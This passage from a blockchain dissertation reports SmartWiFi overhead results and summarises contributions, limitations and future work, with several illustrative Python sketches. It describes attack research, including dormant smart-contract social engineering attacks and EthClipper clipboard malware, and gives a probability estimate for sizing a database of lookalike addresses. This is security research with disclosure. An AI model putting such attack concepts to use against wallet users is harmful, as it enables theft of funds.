                                                   User-perceived speed limit based on DupSet (Mbps)
Figure 7.6: Maximum number of clients simultaneously served by the router for 15 min. under
different connectivities, with random web surfing simulation in the background.
if the expectation is reduced to 1 Mbps, serving 40 users simultaneously will likely be a realistic
projection.
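As a rough sanity check on such projections, the idealized per-client share of the router's uplink can be compared against the expected speed. The sketch below is a back-of-the-envelope bound and not the evaluation method used in this chapter; the function names `fair_share_mbps` and `headroom`, and the even-split assumption itself, are introduced here purely for illustration.

```python
def fair_share_mbps(link_mbps: float, clients: int) -> float:
    """Idealized per-client bandwidth if the uplink were split evenly (assumption)."""
    if clients <= 0:
        raise ValueError("clients must be positive")
    return link_mbps / clients


def headroom(link_mbps: float, clients: int, expected_mbps: float) -> float:
    """Ratio of the even-split share to the speed each client expects.

    Values near 1.0 leave no margin for protocol overhead or contention.
    """
    return fair_share_mbps(link_mbps, clients) / expected_mbps


if __name__ == "__main__":
    # The 100 Mbps / 40 users example from the text, at both expectations.
    for expected in (2.0, 1.0):
        ratio = headroom(100.0, 40, expected)
        print(f"expectation {expected} Mbps -> headroom {ratio:.2f}x")
```

In the example from the text, the 2 Mbps expectation leaves only modest headroom under an even split, while the 1 Mbps expectation leaves considerably more, which is consistent with the measured capacity falling below the idealized bound.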
7.6.6: SmartWiFi Communication Overhead
The communication overhead includes the client-router TCP traffic and the Infura blockchain API
communication. We measure overhead by capturing network traffic and calculating a cumulative
one-hour session TCP payload using Wireshark. Each session’s average result is based on 10 mea-
surements. The results in Table 7.5 demonstrate that the overhead of off-chain communication is
low compared to the results for blockchain-related calls.
[Figure 7.7: plot; y-axis: Average DupSet speed (Mbps); x-axis: Number of simultaneously connected
clients; series: Gigabit Ethernet; Cable Modem, 100 Mbps; LTE Modem, ~50 Mbps]
Figure 7.7: Average DupSet readings for different types of Internet connection profiles with differ-
ent number of clients simultaneously served by a SmartWiFi router.
Table 7.5: Session communication overhead for different SmartWiFi calls over 10 measurements.
The local calls represent off-chain communication between the hotspot and the client, including
handshake E_h, connection initiation E_c, connection status check E_s, and acknowledgement E_a.
Blockchain (B/C) calls use the Infura API [11].
    Procedure Call              Avg TCP Payload (bytes)         σ
    Local: E_h                                      580        20
    Local: E_c                                      412         0
    Local: E_s                                      274         9
    Local: E_a                                      334         8
    B/C: download bytecode                       69,797    32,633
    B/C: A_pub-accessor                          51,597    38,224
    B/C: A_pub-mutator                           51,279    34,389
    B/C: Υ_head-accessor                         50,472    33,205
    B/C: Υ_head-mutator                          60,606    36,489
    B/C: balance check                           64,487    46,150
    B/C: payment                                 45,326    28,016
    B/C: refund                                  59,500    41,856
    B/C: fund contract                           56,834    39,542
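To make the gap between off-chain and blockchain-related overhead concrete, the averages in Table 7.5 can be aggregated per category. The sketch below only restates the table's numbers; the dictionary keys and the helper `summarize` are illustrative names, not part of the SmartWiFi implementation.

```python
from statistics import mean

# Average TCP payloads in bytes, copied from Table 7.5.
LOCAL_CALLS = {"E_h": 580, "E_c": 412, "E_s": 274, "E_a": 334}
BLOCKCHAIN_CALLS = {
    "download bytecode": 69_797,
    "A_pub accessor": 51_597,
    "A_pub mutator": 51_279,
    "Y_head accessor": 50_472,
    "Y_head mutator": 60_606,
    "balance check": 64_487,
    "payment": 45_326,
    "refund": 59_500,
    "fund contract": 56_834,
}


def summarize(calls: dict) -> dict:
    """Return total, mean, and extreme payload sizes for one call category."""
    values = list(calls.values())
    return {
        "total": sum(values),
        "mean": mean(values),
        "min": min(values),
        "max": max(values),
    }


if __name__ == "__main__":
    local = summarize(LOCAL_CALLS)
    chain = summarize(BLOCKCHAIN_CALLS)
    print(f"local calls:      total={local['total']} B, mean={local['mean']:.0f} B")
    print(f"blockchain calls: total={chain['total']} B, mean={chain['mean']:.0f} B")
    print(f"smallest blockchain call / largest local call: "
          f"{chain['min'] / local['max']:.0f}x")
```

Even the smallest blockchain call in the table carries a payload far larger than the largest local call, which is the comparison the table is meant to support.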
7.7: Chapter Summary
In this work, we proposed SmartWiFi, a smart contract-enabled WiFi hotspot system, which pro-
vides universal accessibility, cross-domain authentication, association of QoS and payment, and
security enhancement. SmartWiFi utilizes a novel cryptographic mechanism, Hansa, to establish a
connection. Hansa provides low-cost off-chain execution by restricting otherwise unacceptable
smart contract fees, and significantly reduces delays associated with smart contract interaction. To
validate the feasibility of the SmartWiFi system, we designed and implemented a SmartWiFi prototype
using an Ethereum smart contract. The experimental results show that SmartWiFi exhibits low
operational delays, minimal communication overhead, and small blockchain fees. We demonstrated
that SmartWiFi is a scalable, secure, and efficient WiFi hotspot solution, which can be easily de-
ployed in a variety of systems with minimal intervention. The limited adoption of cryptocurrencies
and the volatility of their market prices can be further addressed through the use of stablecoin to-
kens, which we leave for future work.


CHAPTER 8: CONCLUSION
Decentralized distributed systems, such as blockchain and DAG networks, are recent candidates
for integration into the Smart World. These systems can significantly increase digital equity, free-
dom, and privacy, but their integration is hindered by several fundamental technical challenges that
this dissertation aims to address. Our extensive research and literature review reveal that the
challenges hindering the integration of decentralized distributed systems into the Smart World can
be subdivided into three major categories: security, scalability, and usability. Accordingly, the core
methodology of our present and future research is to meticulously address these three groups of
challenges, thereby fostering the adoption of blockchain and other decentralized distributed systems
by the modern world.
8.1: Summary of Contributions
In this dissertation, we addressed three major challenges hindering the integration of
blockchain technology into the Smart World ecosystem: security, scalability, and usability.
We unraveled new blockchain attacks, classified existing threat mitigation solutions, proposed
a new concept of defense, and discovered new trust-free applications of blockchain technology.
Specifically, this dissertation makes the following contributions.
Social Engineering Attacks in Smart Contracts: We explore the possibility and existence of
new social engineering attacks beyond smart contract honeypots. We present two novel classes of
Ethereum social engineering attacks — Address Manipulation and Homograph — and develop six
zero-day social engineering attacks. To show how the attacks can be used in popular programming
patterns, we conduct a case study of five popular smart contracts with a combined market
capitalization exceeding $29 billion, and integrate our attack patterns into their source code without
altering their existing functionality. Moreover, we show that these attacks remain dormant during the
test phase and activate their malicious logic only at the final production deployment. We further
analyze 85,656 open-source smart contracts and discover that 1,027 of them can be used for the
proposed social engineering attacks. We conduct a professional opinion survey with experts from
seven smart contract auditing firms, corroborating that the exposed social engineering attacks pose
a major threat to smart contract systems.
Attacking Hardware Wallets: We introduce EthClipper, an attack that targets owners of hardware
wallets on the Ethereum platform. EthClipper malware queries a distributed database of pre-mined
accounts in order to select the address with maximum visual similarity to the original one. We
design and implement the EthClipper malware, which we test on Trezor, Ledger, and KeepKey wallets.
To deliver computation and storage for the attack, we implement a distributed service,
ClipperCloud, and test it in four deployment environments. Our evaluation shows that with off-the-shelf
PCs and NAS storage, an attacker would be able to mine a database capable of matching 25% of the
digits in an address to achieve a 50% chance of finding a fitting fake address. For responsible
disclosure, we have contacted the manufacturers of the hardware wallets used in the attack evaluation,
and they all confirmed the danger of EthClipper.
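To give a feel for the scale of such a database, the sketch below estimates how many uniformly random addresses are needed before at least one of them agrees with a target on a fixed set of hex digits. This is a simplified model under stated assumptions (independent, uniformly distributed addresses; an exact match on pre-chosen digit positions) and does not reproduce the visual similarity metric or the measurements of this dissertation; the function names are hypothetical.

```python
import math

HEX_SYMBOLS = 16      # possible values of one address digit
ADDRESS_DIGITS = 40   # hex digits in an Ethereum address


def match_probability(matched_digits: int) -> float:
    """Chance that one random address matches a target on the chosen digits."""
    return float(HEX_SYMBOLS) ** -matched_digits


def database_size(matched_digits: int, success_chance: float) -> float:
    """Number of random addresses needed so that at least one matches
    with probability `success_chance` (simplified model, see lead-in)."""
    q = match_probability(matched_digits)
    # Solve 1 - (1 - q)^n = success_chance for n; log1p keeps precision for tiny q.
    return math.log1p(-success_chance) / math.log1p(-q)


if __name__ == "__main__":
    digits = ADDRESS_DIGITS // 4  # 25% of the address digits
    n = database_size(digits, 0.5)
    print(f"matching {digits} digits with 50% chance needs about {n:.2e} addresses")
```

Under this model the required database grows by a factor of 16 for every additional matched digit, which is why the fraction of matched digits is the key parameter of the attack.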
Taxonomy and Classification of Threat Mitigation Solutions in Smart Contracts: We develop
a comprehensive classification taxonomy of smart contract threat mitigation solutions within five
orthogonal dimensions: defense modality, core method, targeted contracts, input-output data map-
ping, and threat model. We classify 133 existing threat mitigation solutions using our taxonomy
and confirm that the proposed five dimensions allow us to concisely and accurately describe any
smart contract threat mitigation solution. In addition to learning what the threat mitigation solu-
tions do, we also show how these solutions work by synthesizing their actual designs into a set
of uniform workflows corresponding to the eight existing defense core methods. We further cre-
ate an integrated coverage map for the known smart contract vulnerabilities by the existing threat
mitigation solutions. Finally, we perform an evidence-based evolutionary analysis, in which we
identify trends and future perspectives of threat mitigation in smart contracts and pinpoint major
weaknesses of the existing methodologies. For the convenience of smart contract security
developers, auditors, users, and researchers, we deploy a regularly updated comprehensive open-source
online registry of threat mitigation solutions.
Context-Aware User-Centered Transaction Testing: We propose a new smart contract security
testing approach called transaction encapsulation. The core idea lies in the local execution of
transactions on a fully synchronized yet isolated Ethereum node, which creates a preview of the
outcomes of transaction sequences on the current state of the blockchain. To overcome the well-known
time-of-check/time-of-use (TOCTOU) problem, i.e., to ensure that the final transactions exhibit the
same execution paths as the encapsulated test transactions, we determine the exact conditions for
guaranteed execution path replicability of the tested transactions. To demonstrate transaction
encapsulation, we implement a transaction testing tool, TxT, which reveals the actual outcomes
(either benign or malicious) of Ethereum transactions. To ensure the correctness of testing, TxT
deterministically verifies whether a given sequence of transactions follows an identical execution
path on the current state of the blockchain. We analyze over 1.3 billion Ethereum transactions and
determine that 96.5% of them can be verified by TxT. We further show that TxT successfully reveals
the suspicious behaviors associated with 31 out of 37 vulnerabilities (83.8% coverage) in the Smart
Contract Weakness Classification (SWC) registry. In comparison, the vulnerability coverage of all
the existing defense approaches combined only reaches 40.5%.
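The preview-then-submit idea can be illustrated with a toy model in which the blockchain state is an in-memory dictionary of balances. This is not TxT and does not use an Ethereum node; every name below is hypothetical, and the whole-state digest comparison is a deliberately crude stand-in for the replicability conditions derived in this dissertation, which are not reproduced here.

```python
import copy
import hashlib
import json


def state_digest(state: dict) -> str:
    """Hash a canonical JSON encoding of the toy state."""
    encoded = json.dumps(state, sort_keys=True).encode()
    return hashlib.sha256(encoded).hexdigest()


def transfer(state: dict, sender: str, recipient: str, amount: int) -> None:
    """Toy transaction: move `amount` between balances or raise on failure."""
    if state.get(sender, 0) < amount:
        raise ValueError("insufficient balance")
    state[sender] -= amount
    state[recipient] = state.get(recipient, 0) + amount


def preview(state: dict, transactions: list) -> tuple:
    """Execute the sequence on an isolated copy and return the previewed
    outcome together with a digest of the state it was tested against."""
    sandbox = copy.deepcopy(state)
    for tx, args in transactions:
        tx(sandbox, *args)
    return sandbox, state_digest(state)


def submit_if_unchanged(live: dict, transactions: list, tested_digest: str) -> bool:
    """Apply the sequence only if the live state still equals the tested one."""
    if state_digest(live) != tested_digest:
        return False  # state moved between check and use; the preview is stale
    for tx, args in transactions:
        tx(live, *args)
    return True


if __name__ == "__main__":
    live = {"alice": 10, "bob": 0}
    txs = [(transfer, ("alice", "bob", 4))]
    outcome, digest = preview(live, txs)
    print("previewed outcome:", outcome)
    print("submitted:", submit_if_unchanged(live, txs, digest))
```

Refusing to submit whenever any part of the state has changed is far stricter than necessary; a practical tool only needs to rule out changes that can alter the execution path of the tested transactions.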
Smart Contracts on the Cloud: We determine that the major obstacle to the scalability of public
blockchains is their underlying unstructured P2P networks. We further show that a centralized network
can support the deployment of decentralized smart contracts. We propose a novel approach for
achieving scalable decentralization: instead of trying to make blockchain scalable, we deliver
decentralization to the already scalable cloud by using an Ethereum smart contract. We introduce
Blockumulus, a framework that can deploy decentralized cloud smart contract environments using a novel
technique called overlay consensus. Through experiments, we demonstrate that Blockumulus is
scalable in all three dimensions: computation, data storage, and transaction throughput. Besides
eliminating the current code execution and storage restrictions, Blockumulus delivers a transaction
latency between 2 and 5 seconds under normal load. Moreover, the stress test of our prototype
reveals the ability to execute 20,000 simultaneous transactions in under 26 seconds, which is on par
with the average throughput of worldwide credit card transactions.
Blockchain-Assisted Wireless Cross-Domain Authentication: We propose SmartWiFi, a
universal, secure, and decentralized WiFi hotspot that can be deployed in any public or private
environment. SmartWiFi provides cross-domain authentication, fully automated accounting and
payments, and security assurance for both hotspots and clients. SmartWiFi utilizes a novel off-chain
transaction scheme called Hash Chain-based Network Connectivity Satisfaction Acknowledgement
(Hansa), which enables a fast and low-cost provider-client protocol by restricting otherwise
unacceptable delays and fees associated with blockchain interaction. In addition, we present DupSet,
a dynamic user-perceived speed estimation technique, which can reliably evaluate the quality of
Internet connection from the users’ perspective. We design and implement SmartWiFi desktop and
mobile apps using an Ethereum smart contract. With extensive experimental evaluation, we demon-
strate that SmartWiFi exhibits rapid execution with low communication overhead and reduced fees.
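The general idea behind hash chain-based acknowledgements can be sketched as follows: the client commits to the head of a hash chain once and then releases preimages one by one, each of which the hotspot verifies with a single hash and no blockchain call. This is a generic illustration of the hash chain technique and not the Hansa message format or its on-chain logic; SHA-256 and the names `build_chain` and `Verifier` are assumptions made for the example.

```python
import hashlib
import os


def h(data: bytes) -> bytes:
    """One hash step (SHA-256 chosen for illustration only)."""
    return hashlib.sha256(data).digest()


def build_chain(seed: bytes, length: int) -> list:
    """Return [x_0, ..., x_length] with x_0 = seed and x_i = H(x_{i-1})."""
    chain = [seed]
    for _ in range(length):
        chain.append(h(chain[-1]))
    return chain


class Verifier:
    """Hotspot side: stores only the committed head and the last accepted link."""

    def __init__(self, head: bytes):
        self.last = head
        self.accepted = 0

    def acknowledge(self, token: bytes) -> bool:
        """Accept a token only if it hashes to the previously accepted link."""
        if h(token) != self.last:
            return False
        self.last = token
        self.accepted += 1
        return True


if __name__ == "__main__":
    chain = build_chain(os.urandom(32), 5)   # client side, kept secret
    hotspot = Verifier(chain[-1])            # head is the public commitment
    for token in reversed(chain[:-1]):       # release preimages one per interval
        assert hotspot.acknowledge(token)
    print("acknowledged intervals:", hotspot.accepted)
```

Because each token is a preimage of the previous one, the hotspot cannot forge the next acknowledgement, and a replayed token is rejected since it no longer hashes to the last accepted link.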
8.2: Limitations and Discussion
Although the research described in this dissertation makes a significant contribution to the field of
blockchain integration, our work has limitations and room for further improvement. Below are...
Social Engineering Attacks in Smart Contracts: In this dissertation, we have highlighted crucial
security vulnerabilities in Ethereum smart contracts caused by social engineering attacks. While
this work contributes significantly to understanding these threats, there are certain limitations and
future work requirements that need to be addressed. First, the work focuses on Ethereum smart
contracts, which, although being the most widely used, are not the only existing smart contract
platforms. Extending the analysis to other platforms such as Binance Smart Chain, Cardano, and
Polkadot can provide a comprehensive understanding of social engineering vulnerabilities across
the blockchain ecosystem. Second, social engineering attacks continue to evolve, and as new
techniques emerge, our study may require updates to stay relevant. Regularly updating the research
with the latest attack vectors can help practitioners better protect against evolving threats. Third,
while the work addresses technical aspects of social engineering attacks, it is essential to focus on
human factors contributing to the success of these attacks, such as cognitive biases and
susceptibility to manipulation. Future work can explore psychological and behavioral aspects to design more
effective countermeasures. Fourth, the work identifies vulnerabilities and possible attack vectors
but could benefit from a deeper exploration of mitigation strategies. Expanding the research to
propose and evaluate concrete solutions, such as secure coding practices, enhanced auditing, and
education initiatives, can help developers and users fortify their defenses against social engineering
attacks. Fifth, the work can be strengthened by analyzing real-world instances of social
engineering attacks on Ethereum smart contracts. These case studies will provide valuable insights into
how attackers exploit vulnerabilities and the consequences of these breaches. Last but not least,
our future work can benefit from collaboration between cybersecurity, social science, and legal
experts to develop a holistic approach to understanding and addressing social engineering threats
in smart contracts. Addressing these limitations and focusing on future work will not only improve
the quality of our future research but also contribute to advancing the understanding and mitigation
of social engineering attacks in smart contracts and the broader blockchain ecosystem.
Attacking Hardware Wallets: In this dissertation, we introduce an innovative attack vector that
exploits clipboard manipulation to target hardware wallets. This work, however, has some limita-
tions that need to be addressed and areas where future work is required. First, the work primarily
focuses on EthClipper’s impact on Ethereum-based hardware wallets. Investigating the potential
of similar attacks on other cryptocurrencies (e.g., Bitcoin, Litecoin) and wallet types (e.g., soft-
ware wallets, mobile wallets) will help provide a broader perspective on the risks associated with
clipboard meddling attacks. Second, the work only presents one method for evading address verifi-
cation mechanisms. Future work can explore other potential evasion techniques, as well as assess
the effectiveness of existing countermeasures in protecting against these attacks. Third, although
our dissertation identifies the vulnerabilities and attack vectors, it could benefit from a more in-
depth analysis of potential countermeasures and mitigation strategies. Proposing and evaluating
solutions to prevent or detect clipboard meddling attacks, such as secure clipboard APIs,
behavioral analytics, and user education, will contribute to strengthening the security of hardware
wallets and the wider cryptocurrency ecosystem. Fourth, our research would benefit from analyzing
real-world instances of clipboard meddling attacks on hardware wallets. Examining such cases can
provide valuable insights into the tactics used by attackers, the effectiveness of existing defenses,
and the consequences of these security breaches. Fifth, our future work can explore the balance
between user experience and security in the context of hardware wallets. Investigating usability
aspects that may inadvertently contribute to the success of clipboard meddling attacks can inform
the design of more secure and user-friendly wallet solutions. Finally, we should consider analyz-
ing clipboard meddling attacks across various operating systems and platforms, such as Windows,
macOS, Linux, Android, and iOS, to gain a comprehensive understanding of the risks and potential
mitigation strategies.
Taxonomy of Threat Mitigation in Smart Contracts: In this dissertation, we provide a compre-
hensive overview of security threats and mitigation techniques for smart contracts. However, there
are certain limitations that need to be addressed, and areas where future work is required. First, se-
curity threats and mitigation techniques evolve over time. The survey paper may become outdated
as new threats and solutions emerge. Periodically updating the survey with the latest developments
will help maintain its relevance and usefulness to practitioners and researchers. Second, the survey
primarily focuses on Ethereum-based smart contracts. However, various other smart contract
platforms exist, such as Binance Smart Chain, Cardano, and Polkadot. Extending the survey to cover
security threats and mitigation techniques for these platforms will provide a more comprehensive
understanding of the smart contract security landscape. Third, the work covers technical aspects of
smart contract security but could benefit from incorporating insights from other disciplines, such
as legal, economic, and social sciences. Integrating these perspectives can lead to a more holis-
tic understanding of security challenges and potential solutions in the smart contract ecosystem.
Fourth, as the field of smart contracts and blockchain technology continues to advance, new tools
and techniques are being developed. Future work can explore the impact of emerging technologies,
such as zero-knowledge proofs, formal verification, and secure multi-party computation, on smart
contract security and threat mitigation. Fifth, the survey can benefit from a discussion of the
trade-offs between usability and security in the design and implementation of smart contracts.
Understanding these trade-offs can help guide the development of more secure and user-friendly smart
contract solutions. Finally, including real-world case studies of smart contract security breaches,
their consequences, and the efficacy of various mitigation
techniques will provide valuable context and practical insights for the survey’s audience.
Real-Time Transaction Testing: In this dissertation, we present a novel approach to enhance
the security and efficiency of Ethereum smart contracts by encapsulating transactions in real-time.
While this work contributes significantly to the field, there are certain limitations that need to be
addressed and areas where future work is required. First, our work can benefit from a more
extensive performance evaluation of the transaction encapsulation approach. This may include
analyzing the overhead introduced by transaction encapsulation, the impact on transaction through-
put, and the scalability of the approach in different scenarios and network conditions. Second, a
detailed security analysis of the transaction encapsulation approach is essential to understand its
effectiveness in mitigating potential attacks and vulnerabilities. Future work can explore possible
attack vectors that may target the encapsulation mechanism and evaluate the efficacy of the TxT
approach in addressing these threats. Third, investigating the compatibility and integration
challenges of the TxT tester with existing smart contract development and deployment tools, such as
Truffle and Remix, will help identify potential barriers to adoption and guide the development
of more seamless integration strategies. Fourth, as the blockchain ecosystem continues to evolve,
interoperability between different platforms is becoming increasingly important. Future work can
explore the potential of the transaction encapsulation approach in facilitating cross-chain commu-
nication and bridging different blockchain networks. Finally, it is important to consider the impact
of the transaction encapsulation testing approach on user experience and adoption, as these factors
are crucial for its success. Investigating the ease of use, potential learning curve, and changes to
existing workflows for developers and end-users can help inform the design and development of
more user-friendly transaction encapsulation solutions.
Smart Contracts on the Cloud: In this dissertation, we present an innovative framework that
leverages cloud computing to enhance the scalability of smart contract execution. While this work
contributes significantly to the field, there are some limitations to address and areas where future
work is required. First, cloud-based infrastructure introduces new security and privacy challenges.
A detailed analysis of the potential security risks and privacy implications of the Blockumulus
framework is crucial to ensure its robustness and reliability. Future work can explore the inte-
gration of advanced security techniques, such as zero-knowledge proofs and secure multi-party
computation, to address these concerns. Second, our work can benefit from a comprehensive cost
analysis of the Blockumulus framework, comparing the costs of on-chain and off-chain computa-
tion and storage, as well as the trade-offs between scalability, performance, and costs associated
with using cloud-based infrastructure. Third, further performance evaluation of the Blockumulus
framework is essential to understand its scalability and efficiency. This may include analyzing var-
ious performance metrics such as transaction throughput, latency, and resource utilization under
different workloads and network conditions. Finally, investigating the challenges and barriers to
deploying and adopting the Blockumulus framework, including compatibility with existing tools,
legal and regulatory considerations, and user acceptance, can help guide the development of more
practical and widely adopted solutions.
Decentralized Wi-Fi Hotspots: We propose in this dissertation a new solution that leverages smart
contracts to provide secure and universal access to WiFi hotspots. Yet, the work has some limi-
tations and room for future improvement. First, a comprehensive cost analysis of the SmartWiFi
system is necessary to understand the trade-offs between access fees, infrastructure costs, and trans-
action fees associated with smart contract execution. This would help users and hotspot providers
make informed decisions regarding the adoption and deployment of the SmartWiFi system.
Second, future work can investigate dynamic pricing models and incentive mechanisms to optimize the
allocation of WiFi resources and encourage more hotspot providers to participate in the SmartWiFi ecosystem.
This could involve the use of game theory, auction mechanisms, or reputation systems to create
a fair and economically efficient marketplace. Third, it is important to conduct pilot studies or
real-world deployments of the SmartWiFi system in various environments, such as urban centers,
airports, or university campuses, to validate its performance, usability, and security under differ-
ent conditions. This would help identify potential challenges, gather user feedback, and refine the
SmartWiFi solution based on real-world experiences.
8.3: Lessons Learned
Blockchain is still an emergent technology undergoing a steady integration into the Smart World
ecosystem. Unsurprisingly, the new technology is strewn with common misconceptions and
surprising discoveries. Our understanding of blockchain changed as we researched it further. Below
are some of the most important lessons that we have learned in the course of the research presented
in this dissertation.
Human-in-the-Loop: Smart contracts are designed and implemented by human developers to
interact with human users, which makes the human the central component of a smart contract ecosystem.
Yet, most existing smart contract security studies do not take the human factor seriously. We are the
first to study social engineering attacks in smart contracts. We developed six zero-day attacks and
demonstrated that most of them remain dormant on the testnet and activate their malicious capacity
only when deployed on a production network.
Blockchain Evolution, not Revolution: A significant motivational factor for blockchain integra-
tion is that the technology practically enables smart contracts, which existed only as a concept
before the era of blockchain. Together blockchain and smart contracts deliver some unique impor-
tant properties, such as full or partial decentralization, non-repudiation, permanent recording, and
trustless computation. These key properties enable a broad spectrum of important decentralized
applications, such as decentralized finance, various data certifications and proofs, unaffiliated
identity and key management, different voting and election schemes, legal contracts, and many
more, spurring the notion of blockchain as a revolutionary technology. However, the reality
suggests that despite its enormous potential, there is nothing revolutionary about blockchain. Our
research and careful observation suggest that instead of a blockchain revolution, we are facing a
steady blockchain evolution. Specifically, like any other technology, blockchain began with an
idea (e.g., fair machine), followed by specific concepts (e.g., reasonably hard computation), which
then turned into the first prototypes (e.g., Ethereum). The next step, integration, is a painstaking process of
making the technology more secure, scalable, and usable — which is the main goal of the research
in this dissertation.
Distributed Service versus Utility: Our research shows that distributed computation is
transitioning from the concept of service towards the concept of next-generation utility, which is to be
provided in a generic form, separated from specific apps. For example, using cloud as a utility
allows a smartphone user to “plug” their apps into the cloud(s) of their choice, instead of using the cloud
predetermined by developers. Furthermore, we discovered sufficient evidence that cloud providers’
existing user data collection practices often breach user privacy, which necessitates the use of zero-
knowledge protocols. As the first step in this evolutionary transformation, we created the first
distributed framework for smart contracts on the cloud called Blockumulus. Instead of completely
replacing blockchain with a cloud, Blockumulus uses the Ethereum blockchain as a guarantor of the
permissionless properties of cloud contracts. Our future vision of privacy-preserving cloud with
sovereign identities further elaborates on the idea of distributed computation-as-a-utility.
Scalability is Multi-Dimensional: Blockchain is notorious for trading performance for decentralization,
a trade-off known as the blockchain scalability problem, which manifests in limited computation,
bounded data storage, and insufficient transaction throughput. In addition to the
performance-decentralization trade-off, sometimes referred to as the blockchain scalability trilemma [140],
we also discovered an inter-performance trade-off in decentralized distributed systems, which
involves a balance among transaction throughput, computation, and data storage. To tackle this
problem, we proposed a shift of approach. Instead of delivering scalability to blockchain, as in
previous solutions, we port blockchain properties into a distributed system that is already scalable,
i.e., the cloud.

8.4: Future Work
In the future, we will continue advancing the frontier of adoption of decentralized distributed sys-
tems by addressing their security, scalability, and usability challenges, as outlined below.
Security Data Flow Analysis via Parsing: Our preliminary work demonstrates the ability to au-
tomatically detect some covert security threats, such as overflows and backdoors, across a broad
spectrum of software. Our novel approach proceeds in two steps: 1) parse the source code (using
the RPLY or similar framework) with a special augmented grammar to extract some important facts;
2) use the extracted facts for security data flow analysis (DFA) based on the Datalog declarative
logical language. We recently applied this methodology to find security issues related to unsafe de-
pendency between Ethereum accounts in smart contracts. Our preliminary evaluation corroborates
the accuracy and efficiency of the approach. Thus, this approach has the potential to be developed
into a new general security method suitable for addressing a wide variety of security issues in
multiple domains.
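As an illustration of the two steps above, the following minimal Python sketch extracts assignment facts from a toy program and then evaluates Datalog-style rules to a fixpoint. It is not the tool described here: a regular expression stands in for the RPLY grammar, a hand-written loop stands in for a Datalog engine, and the fact and rule names (assign, tainted, alerts) as well as the toy program are assumptions made only for this example.

```python
import re

# Step 1 (stand-in for a grammar-based parser): extract facts from a toy program.
# Each fact assign(dst, src) records that variable `dst` is computed from `src`.
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
IDENT = re.compile(r"[A-Za-z_]\w*")


def extract_facts(source: str):
    """Return the set of (dst, src) assignment facts found in the toy program."""
    facts = set()
    for line in source.splitlines():
        match = ASSIGN.match(line)
        if match:
            dst, expr = match.groups()
            for src in IDENT.findall(expr):
                facts.add((dst, src))
    return facts


# Step 2: Datalog-style rules, evaluated naively until nothing new is derived.
#   tainted(X) :- source(X).
#   tainted(Y) :- assign(Y, X), tainted(X).
#   alert(X)   :- sink(X), tainted(X).
def tainted_variables(assign_facts, sources):
    """Compute the least fixpoint of the two `tainted` rules."""
    tainted = set(sources)
    changed = True
    while changed:
        changed = False
        for dst, src in assign_facts:
            if src in tainted and dst not in tainted:
                tainted.add(dst)
                changed = True
    return tainted


def alerts(assign_facts, sources, sinks):
    """Return the sinks reachable from an untrusted source, in sorted order."""
    return sorted(set(sinks) & tainted_variables(assign_facts, sources))


# Hypothetical toy program: `user_input` is untrusted, `payout` is sensitive.
PROGRAM = """
amount = user_input
fee = 3
total = amount + fee
recipient = owner
payout = total
"""

facts = extract_facts(PROGRAM)
print(alerts(facts, sources={"user_input"}, sinks={"payout", "recipient"}))
```

In this sketch, the untrusted value reaches payout through amount and total, so payout is the only sink reported. Keeping fact extraction separate from the rules means the same rules can, in principle, be reused with a different parser front end.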
Privacy-Preserving Cloud with Self-Sovereign Identities: Previous attempts to make the cloud
more privacy-preserving, user-centered, and versatile are scarce and address only a small subset of
existing problems. To address the shortage of such systems, we envision a new paradigm called
Cloud 2.0, which introduces the concept of Data-Execution Models (DEMs) for safeguarding and
managing the communication among client apps, distributed services, and external actors (e.g.,
other apps). As a result, our new cloud will enable the following three properties: 1) guaranteed
user-controlled redundancy: if one service is down, the remaining ones continue working; 2) sepa-
ration of apps from services: the user can switch, connect, or disconnect services according to their
needs without switching to different apps; 3) enforced privacy: the user can have full control of
their data by design, not by promise. Achieving this ambitious vision requires extensive research
to address significant technical challenges that Cloud 2.0 faces, including, but not limited to, DEM
security, backward compatibility, DEM upgrade, scalability, and performance.
Friction-Free Public-Key Authentication: Traditional password-based authentication is associ-
ated with many security, privacy, and usability issues. As opposed to that, public-key authentication
enhances privacy, security, and flexibility. Some popular services, such as GitHub and Ethereum,
successfully use public-key authentication. Yet, the adoption of this approach by many services is
impeded by the necessity for users to learn new concepts and perform additional steps (e.g., key
generation), which is known as technological friction. Overcoming the friction associated with
public-key authentication requires creating novel applied cryptography protocols for seamless
generation of private keys, account storage, and public-key signatures. Moreover, these protocols must
be compatible with legacy systems. As a result, usable public-key authentication can address many
existing security and privacy problems in the modern world.
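To make the additional user steps concrete, the following minimal sketch walks through key generation and the signing of a server challenge. It is an illustration only and not a protocol proposed in this dissertation: it uses a Lamport one-time signature built from SHA-256 so that it runs with the Python standard library alone, whereas deployed services rely on other signature schemes. The function names (keygen, sign, verify, new_challenge) are hypothetical, and a Lamport key pair must not be used for more than one signature.

```python
import hashlib
import secrets

BITS = 256  # length of a SHA-256 digest in bits


def keygen():
    """Create a one-time key pair: 256 pairs of secrets and their hashes."""
    private_key = [
        (secrets.token_bytes(32), secrets.token_bytes(32)) for _ in range(BITS)
    ]
    public_key = [
        (hashlib.sha256(a).digest(), hashlib.sha256(b).digest())
        for a, b in private_key
    ]
    return private_key, public_key


def message_bits(message: bytes):
    """Hash the message and return the digest as a list of 256 bits."""
    digest = hashlib.sha256(message).digest()
    return [(digest[i // 8] >> (7 - i % 8)) & 1 for i in range(BITS)]


def sign(private_key, message: bytes):
    """Reveal one secret per digest bit (this is why the key is one-time)."""
    return [private_key[i][bit] for i, bit in enumerate(message_bits(message))]


def verify(public_key, message: bytes, signature) -> bool:
    """Check that each revealed secret hashes to the matching public value."""
    if len(signature) != BITS:
        return False
    return all(
        hashlib.sha256(secret).digest() == public_key[i][bit]
        for i, (bit, secret) in enumerate(zip(message_bits(message), signature))
    )


def new_challenge() -> bytes:
    """Server side: a fresh random nonce prevents replay of old signatures."""
    return secrets.token_bytes(32)


# Registration: the user generates keys and gives the server only the public key.
private_key, public_key = keygen()

# Login: the server sends a challenge, the user signs it, the server verifies.
challenge = new_challenge()
signature = sign(private_key, challenge)
print(verify(public_key, challenge, signature))
```

Unlike a password, the private key never leaves the user's device; the server stores only the public key. The key generation and signing steps shown here are the ones that a friction-free protocol would need to hide from the user.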

                                      BIBLIOGRAPHY
 [1] The average number of credit card transactions per day & year. https://www.cardrates.com/
     advice/number-of-credit-card-transactions-per-day-year/. Accessed: 2021-01-12.
 [2] eduroam - World Wide Education Roaming for Research & Education. https://www.eduroam.org/.
     Accessed: 2020-05-10.
 [3] ETH Gas Station. https://ethgasstation.info/. Accessed: 2020-05-17.
 [4] Ethereum average transaction fee.
     https://ycharts.com/indicators/ethereum_average_transaction_fee. Accessed: 2021-01-13.
